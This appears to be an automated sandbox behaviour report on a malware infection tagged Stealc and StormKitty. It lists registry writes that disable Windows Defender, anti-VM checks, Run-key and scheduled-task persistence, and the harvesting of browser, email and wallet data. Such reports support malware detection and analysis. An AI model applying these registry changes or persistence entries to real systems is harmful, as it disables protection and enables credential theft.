Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A

Stealc

stealer stealc

Stealc family

stealc

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\68a19ce725.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108770101\\68a19ce725.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dd29a77f54.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108780101\\dd29a77f54.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0c6733a3b9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\0c6733a3b9.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a53c2ef5e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108750101\\a53c2ef5e2.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3a82a50014.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108760101\\3a82a50014.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
